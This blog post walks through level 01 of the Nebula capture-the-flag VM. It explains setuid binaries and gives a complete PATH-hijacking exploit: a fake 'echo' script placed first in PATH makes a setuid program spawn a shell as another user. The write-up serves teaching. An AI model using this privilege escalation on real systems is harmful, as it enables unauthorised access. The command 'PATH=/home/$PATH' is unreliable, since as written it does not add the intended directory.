---
layout: post
title: "Nebula Series - Level 01"
---

*Nebula is the first in a series of VMs from Exploit Exercises. It consists of 20 levels which range
in difficulty from simple to intermediate and cover topics like Linux privilege escalation and file
system race conditions.*

**Level 01** introduces us to the concept of setuid and the dangers of trusting the user's environment
to invoke another executable from within our code.

<!--more-->

`setuid` and `setgid` are unix flags that allow us to
run an executable with the permissions of the executable's owner or group. Improperly designed setuid
executables can be used for privilege escalation.

Inspecting the `flag01` users home directory, we see a single executable named `/flag01`

We can check the permissions with

```shell
$ stat -c "%a" /home/flag01/flag01

4750
```

The leading 4 indicates that the setuid permission is
set.

Alternatively we can run `ls -l` and look for an 's' in the executable position of the user permissions.

```shell
$ ls -l /home/flag01

-rwsr-x--- 1 flag01 level01 7322 2011-11-20 21:22 /home/flag01/flag01
```

Here we also see that the owner is `flag01`.

To make things a little easier for us, we're also provided with the source code.

```c
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  gid = getegid();
  uid = geteuid();

  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  system("/usr/bin/env echo and now what?");
}
```

We can see the application sets our *real* user id and group id using `setresgid` and `setresuid` to
our *effective* user id and group id which it gets with `getegid` and `geteuid`. Then it calls
"echo" using `system()`.

The question is, which `echo`? Well, we can influence that by modifying our path.

Let's create a new file named `echo` in our home directory with the following contents


```bash
#!/bin/bash

/bin/bash
```

Make sure it's executable with

```bash
$ chmod +x /home/level01/echo
```

Add our home directory to the front of our PATH so that our `echo` is the one that gets run

```bash
$ PATH=/home/$PATH
```

All that's left is to run the flag01 executable

```bash
$ /home/flag01/flag01
```

and we will be presented with a bash shell as the `flag01` user. To complete the level we use our escalated
privileges to run getflag

```bash
$ getflag

"You have successfully executed getflag on a target account"
```

In summary:

- `setuid` executables run with the permissions of the owner
- `setgid` executables run with the permissions of the group
- these flags are ignored for interpreted executables
- `setuid/setgid` executables can be exploited if not designed carefully
- relying on the user's environment to run the intended executable using `system` is unsafe
